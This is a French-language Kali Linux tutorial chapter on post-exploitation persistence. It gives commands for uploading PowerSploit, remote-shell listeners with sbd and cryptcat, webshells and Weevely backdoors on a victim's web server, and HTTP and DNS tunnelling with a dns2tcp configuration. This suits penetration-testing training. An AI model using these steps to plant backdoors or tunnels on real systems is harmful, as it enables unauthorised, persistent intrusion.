Kali Linux - Maintenir l'accès

Dans ce chapitre, nous verrons les outils que Kali utilise pour maintenir la connexion et pour accéder à une machine piratée même lorsqu'elle se connecte et se déconnecte à nouveau.

Powersploit

Il s'agit d'un outil destiné aux machines Windows. PowerShell est installé sur la machine des victimes. Cet outil aide le pirate à se connecter à la machine de la victime via PowerShell.

Pour l'ouvrir, ouvrez le terminal sur la gauche et tapez la commande suivante pour entrer dans le dossier powersploit -

cd /usr/share/powersploit/

Si vous tapez “ls”il listera tous les outils powersploit que vous pouvez télécharger et installer sur la machine de la victime après avoir obtenu l'accès. La plupart d'entre eux sont auto-expliqués en fonction de leurs noms.

Un moyen simple de télécharger cet outil sur la machine de la victime est de créer un serveur Web, que les outils powersploit permettent de créer facilement à l'aide de la commande suivante -

python -m SimpleHTTPServer

Après cela, si vous tapez: http: // <adresse_ip de la machine Kali>: 8000 / suivant est le résultat.

Sbd

sbd est un outil similaire à Netcat. Il est portable et peut être utilisé sur les machines Linux et Microsoft. sbd dispose d'un cryptage AES-CBC-128 + HMAC-SHA1> Fondamentalement, il permet de se connecter à la machine d'une victime à tout moment sur un port spécifique et d'envoyer des commandes à distance.

Pour l'ouvrir, allez dans le terminal et tapez “sbd -l -p port” pour que le serveur accepte les connexions.

Dans ce cas, mettons le port 44 là où le serveur écoutera.

Sur le site de la victime, saisissez “sbd IPofserver port”. Une connexion sera établie où nous pourrons envoyer les commandes à distance.

Dans ce cas, il s'agit de «localhost» puisque nous avons effectué le test sur la même machine.

Enfin, sur le serveur, vous verrez qu'une connexion s'est produite comme indiqué dans la capture d'écran suivante.

Webshells

Les Webshells peuvent être utilisés pour maintenir l'accès ou pour pirater un site Web. Mais la plupart d'entre eux sont détectés par des antivirus. Le shell php C99 est très connu parmi les antivirus. Tout antivirus courant le détectera facilement comme un malware.

Généralement, leur fonction principale est d'envoyer des commandes système via des interfaces Web.

Pour l'ouvrir et tapez “cd /usr/share/webshells/” dans le terminal.

Comme vous le voyez, ils sont divisés en classes selon le langage de programmation: asp, aspx, cfm, jsp, perl, php

Si vous entrez dans le dossier PHP, vous pouvez voir tous les webshells pour les pages web php.

Pour télécharger le shell sur un serveur Web, par exemple “simple-backdoor.php” ouvrez la page Web et l'URL du shell Web.

À la fin, écrivez la commande cmd. Vous aurez toutes les informations affichées comme dans la capture d'écran suivante.

Weevely

Weevely est un shell Web PHP qui simule une connexion de type telnet. C'est un outil pour la post-exploitation d'applications Web, et peut être utilisé comme une porte dérobée furtive ou comme un shell Web pour gérer des comptes Web légitimes, même ceux hébergés gratuitement.

Pour l'ouvrir, allez dans le terminal et tapez «weevely» où vous pouvez voir son utilisation.

Pour générer le shell, tapez “weevely generate password pathoffile”. Comme le montre la capture d'écran suivante, il est généré sur le dossier «Bureau» et le fichier doit être téléchargé dans un serveur Web pour y accéder.

Après avoir téléchargé le shell Web comme indiqué dans la capture d'écran suivante, nous pouvons nous connecter avec cmd au serveur à l'aide de la commande “weevely URL password” où vous pouvez voir qu'une session a commencé.

http-tunnel

http-tunnel crée un flux de données virtuel bidirectionnel tunnelé dans les requêtes HTTP. Les demandes peuvent être envoyées via un proxy HTTP si vous le souhaitez. Cela peut être utile pour les utilisateurs derrière des pare-feu restrictifs. Si l'accès WWW est autorisé via un proxy HTTP, il est possible d'utiliser http-tunnel et telnet ou PPP pour se connecter à un ordinateur en dehors du pare-feu.

Tout d'abord, nous devons créer un serveur de tunnel avec la commande suivante -

httptunnel_server –h

Ensuite, sur le type de site client “httptunnel_client –h” et les deux commenceront à accepter les connexions.

dns2tcp

Il s'agit à nouveau d'un outil de tunneling qui permet de faire passer le trafic TCP via le trafic DNS, ce qui signifie le port UDP 53.

Pour le démarrer, tapez “dns2tcpd”. L'utilisation est expliquée lorsque vous ouvrirez le script.

Sur le site serveur, entrez cette commande pour configurer le fichier.

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

Sur le site client, entrez cette commande.

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh [email protected] -p 7891 -D 7076

Le tunneling démarrera avec cette commande.

cryptcat

C'est un autre outil comme Netcat qui permet d'établir une connexion TCP et UDP avec la machine d'une victime de manière cryptée.

Pour démarrer un serveur afin d'écouter une connexion, tapez la commande suivante -

cryptcat –l –p port –n

Où,

  • -l signifie écouter une connexion

  • -p représente le paramètre de numéro de port

  • -n signifie ne pas faire la résolution de nom

Sur le site client, la commande de connexion est “cryptcat IPofServer PortofServer”